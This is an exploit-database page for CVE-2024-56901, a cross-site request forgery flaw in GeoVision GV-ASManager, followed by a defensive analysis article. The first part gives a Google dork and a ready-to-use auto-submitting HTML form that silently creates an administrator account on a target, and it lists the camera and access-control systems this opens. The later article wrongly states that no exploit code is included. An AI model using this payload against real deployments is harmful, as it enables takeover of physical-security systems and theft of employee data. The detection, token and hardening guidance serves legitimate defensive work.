GeoVision GV-ASManager 6.1.1.0 - CSRF

Exploit Author: Giorgi Dograshvili Analysis Author: www.bubbleslearn.ir Category: WebApps Language: HTML Published Date: 2025-04-11 
# Exploit Title: GeoVision GV-ASManager 6.1.1.0 - CSRF 
# Google Dork: inurl:"ASWeb/Login"
# Date: 02-FEB-2025
# Exploit Author: Giorgi Dograshvili [DRAGOWN]
# Vendor Homepage: https://www.geovision.com.tw/
# Software Link: https://www.geovision.com.tw/download/product/
# Version: 6.1.1.0 or less
# Tested on: Windows 10 | Kali Linux
# CVE : CVE-2024-56901
# PoC: https://github.com/DRAGOWN/CVE-2024-56901

A Cross-Site Request Forgery (CSRF) vulnerability in Geovision GV-ASManager web application with the version 6.1.1.0 or less that allows attackers to arbitrarily create Admin accounts via a crafted GET request method. This vulnerability is used in chain with CVE-2024-56903 for a successful CSRF attack.

Requirements
To perform successful attack an attacker requires:
- GeoVision ASManager version 6.1.1.0 or less
- Network access to the GV-ASManager web application (there are cases when there are public access)
- Administrator's interaction with an open session in the browser

Impact
The vulnerability can be leveraged to perform the following unauthorized actions:
A unauthorized account is able to:
- Modify POST method request with GET by leveraging CVE-2024-56903 vulnerability.
- Craft a malicious HTML page which makes changes in the application on behalf of the administrator account.
- Create a new administrator account on behalf of the legit administrator account.
After the successful attack, an attacker will be able to:
- Access the resources such as monitoring cameras, access cards, parking cars, employees and visitors, etc.
- Make changes in data and service network configurations such as employees, access card security information, IP addresses and configurations, etc.
- Disrupt and disconnect services such as monitoring cameras, access controls.
- Clone and duplicate access control data for further attack scenarios.
- Perform CVE-2024-56902 attack to retrieve cleartext password that can be reused in other digital assets of the organization.


The CSRF code:

<html>
  <body>
    <form action="https://[TARGET]/ASWeb/bin/ASWebCommon.srf"># Set the target
      <input type="hidden" name="action" value="UA&#95;SetCreateAccount" />
      <input type="hidden" name="id" value="Malicious" /> # Set Username
      <input type="hidden" name="password" value="Youarecracked999&#33;" /># Set Password
      <input type="hidden" name="email" value="Malicious&#64;geovision&#46;com&#46;tw" /># Set Email
      <input type="hidden" name="level" value="2" /># Set privilege 1-Normal user 2-Administrator
      <input type="submit" value="Submit request" />
    </form>
    <script>
      history.pushState('', '', '/');
      document.forms[0].submit();
    </script>
  </body>
</html>


After a successful attack, you will get access to:
- ASWeb- Access & Security Management 
- TAWeb- Time and Attendance Management 
- VMWeb- Visitor Management 
- ASManager - Access & Security Management software in OS


GeoVision GV‑ASManager 6.1.1.0 — CSRF Vulnerability (CVE-2024-56901): Overview, Impact, and Defensive Guidance

This article provides a practical, defense-oriented analysis of the Cross‑Site Request Forgery (CSRF) class vulnerability that affected GeoVision GV‑ASManager versions 6.1.1.0 and earlier (CVE-2024-56901). It explains what CSRF is, describes the attack at a high level, lists likely impacts, and — most importantly — presents detection, mitigation, and remediation guidance for administrators and incident responders. No exploit code or step‑by‑step attack instructions are included; this material is focused on protecting systems and reducing risk.

Quick facts

Item Detail
Vulnerability class Cross‑Site Request Forgery (CSRF)
Affected product GeoVision GV‑ASManager (ASWeb/ASManager family)
Affected versions 6.1.1.0 and earlier (vendor advisories should be consulted for exact ranges)
CVE CVE-2024-56901
Primary impact Unauthorized creation of administrative accounts via forged browser requests

What is CSRF and why it matters here

Cross‑Site Request Forgery (CSRF) is an attack in which a victim browser, while authenticated to a target web application, is induced to send a request that performs an action the attacker desires. If state-changing endpoints accept requests without strong anti‑CSRF protections or without requiring re‑authentication, an attacker can cause privileged actions to be performed in the context of the victim's session.

In the case of GV‑ASManager, the vulnerability allowed attackers to leverage an authenticated administrator's open browser session to trigger account‑management actions (for example, creating an administrator account). Because administrative capabilities control physical security components (cameras, access control), the consequences are high if an attacker gains persistent admin access.

Affected environment and prerequisites

  • GV‑ASManager web interface version 6.1.1.0 or earlier (confirm exact versions with vendor advisory).
  • Network access to the GV‑ASManager web application (some deployments are reachable from public networks).
  • An authenticated administrator with an active browser session that visits a page controlled by the attacker.

High‑level attack impact

When successfully chained with related vulnerabilities, the practical consequences include:

  • Creation of new administrator accounts that provide persistent access to the access‑control and monitoring infrastructure.
  • Exposure and manipulation of sensitive access data: employee records, access cards, visitor logs, parking controls.
  • Potential denial of service or operational disruption (e.g., disabling cameras, changing network settings, misconfiguring access lists).
  • Possibility of credential exfiltration or lateral movement if further vulnerabilities are chained.

Detection and indicators of compromise (defensive focus)

Detection should focus on application and audit logs, unusual account activity, and anomalous network requests. Key signals to monitor:

  • Unexpected creation of privileged accounts or sudden elevation of privileges. Flag any new accounts added with administrative roles.
  • Administrative actions originating from external or uncommon IP addresses or user agents.
  • Sequence anomalies such as a single administrator session performing only account‑creation actions shortly after visiting an external referrer.
  • Web server logs showing state‑changing requests that originate from cross‑site contexts (look at Referer and Origin headers where available).
  • Unusual spikes in configuration changes or device reboots during off‑hours.

Sample SIEM query concepts (pseudocode for defensive use):

# Pseudocode SIEM query: find newly created admin accounts in the last 24 hours
source = "app_audit_logs"
where event_type == "user_create" and role == "administrator" and timestamp > now()-24h
| join user_login_events on user_id
| alert if count > threshold

Explanation: This SIEM pseudocode searches audit logs for user creation events that set administrator roles within the last 24 hours, correlates them with login events, and triggers alerts if counts exceed an organization‑defined threshold. Tailor fields to your log schema.

Immediate mitigations (short term)

  • Verify vendor advisories and apply any vendor‑issued patches or official mitigations immediately.
  • If patching is not immediately possible, restrict network access to the GV‑ASManager web interface: allow only trusted management subnets, enable IP whitelisting, or require VPN access for administrative traffic.
  • Temporarily require multi‑factor authentication and force re‑authentication for high‑risk administrative operations where possible.
  • Search and remove any unauthorized administrator accounts and rotate credentials for any accounts that may be compromised.
  • Increase logging verbosity for web and audit logs to capture more context for forensic analysis.

Long‑term remediations and hardening

  • Apply the vendor patch to a fixed release as soon as it is available and validated.
  • Implement server‑side anti‑CSRF protections for all state‑changing endpoints: unique, per‑session tokens; verify Origin/Referer headers; require re‑authentication for sensitive operations.
  • Set secure cookie attributes (HttpOnly, Secure, SameSite=strict or Lax as appropriate) to make browser‑based CSRF more difficult.
  • Deploy a Web Application Firewall (WAF) that can block cross‑site request patterns and anomalous POST/GET usage for state changes.
  • Segment the network so that management interfaces are never reachable directly from untrusted networks or the internet.
  • Harden administrative accounts: MFA for all admins, least privilege role design, periodic access reviews, and dedicated admin workstations where feasible.

Secure coding example: anti‑CSRF token (conceptual)

# Conceptual server-side pseudocode for issuing and checking a CSRF token (Python-like pseudocode)
def render_form(session):
    # Generate or reuse a per-session token
    csrf_token = session.get("csrf_token") or secure_random()
    session["csrf_token"] = csrf_token
    # Embed this token into forms
    return render_template("form.html", csrf_token=csrf_token)

def handle_form_submission(request, session):
    submitted_token = request.form.get("csrf_token")
    stored_token = session.get("csrf_token")
    if not stored_token or not submitted_token or not secure_compare(stored_token, submitted_token):
        return Response("Forbidden", status=403)
    # Proceed with the sensitive operation

Explanation: This pseudocode demonstrates a common anti‑CSRF pattern. The server generates a cryptographically strong token and stores it in the user's session. The token is embedded in HTML forms (or sent via a custom header for XHR/fetch). On submission, the server verifies the token using a timing‑safe comparison. If verification fails, the request is rejected. This prevents forged cross‑site requests because an attacker cannot read the victim's session token from another site.

Example: setting secure cookie attributes

# Example HTTP Set-Cookie header values (illustrative)
Set-Cookie: session_id=abc123; Secure; HttpOnly; SameSite=Strict; Path=/; Max-Age=3600

Explanation: This header sets the session cookie with Secure (sent only over HTTPS), HttpOnly (not accessible to JavaScript), and SameSite=Strict (blocks most third‑party cross‑site requests). These attributes reduce the risk of cookie‑based session theft and make some types of CSRF attacks more difficult. Choose SameSite setting carefully based on application behavior; Lax is a reasonable compromise for many sites.

Network and operational controls

  • Use VPNs or jump servers for administrative access and place management interfaces behind create‑only bastion hosts.
  • Deploy WAF signatures tuned to detect abnormal HTTP methods used for sensitive endpoints and anomalous referer/header patterns.
  • Run periodic automated scans and authenticated application tests to detect missing CSRF protections on state‑changing endpoints.
  • Maintain rigorous change control and alerting on configuration or user‑role changes in IAM and application logs.

Incident response playbook (high level)

  • Contain: Immediately restrict administrative access to the application and isolate affected hosts from untrusted networks.
  • Eradicate: Identify and remove malicious administrator accounts; rotate credentials and secrets; patch or apply vendor mitigations.
  • Recover: Restore services from known‑good configurations and verify system integrity. Reintroduce access gradually with enhanced monitoring.
  • Forensics: Preserve web, system, and network logs; collect evidence for timeline reconstruction. Look for lateral movement and follow‑on activity.
  • Notification: Follow regulatory and vendor notification procedures if sensitive data or safety controls were affected.

Operational recommendations and checklist

  • Confirm GV‑ASManager instances and versions in your estate; prioritize public‑facing and externally accessible instances.
  • Apply vendor updates and patches as they become available.
  • Enforce MFA, strong password policies, and least‑privilege role separation for administrators.
  • Enable detailed auditing for account lifecycle events and review logs regularly.
  • Conduct tabletop exercises and phishing simulations to reduce the risk that administrators visit malicious sites while logged in.

References and further reading

  • Vendor homepage for product updates and advisories (check official GeoVision channels for patches and guidance).
  • OWASP guidance on Cross‑Site Request Forgery: explains defensive patterns and secure implementations.
  • CVE‑tracking resources for authoritative vulnerability details and remediation timelines.

Closing note

If you operate GV‑ASManager in your environment, treat this vulnerability as high priority: patch or apply mitigations immediately, audit administrative accounts, and harden network access. If you need help developing detection rules for your logging stack or implementing the anti‑CSRF patterns described above in a specific technology stack, provide details of your stack and available logs and I can provide defensive, implementation‑level guidance.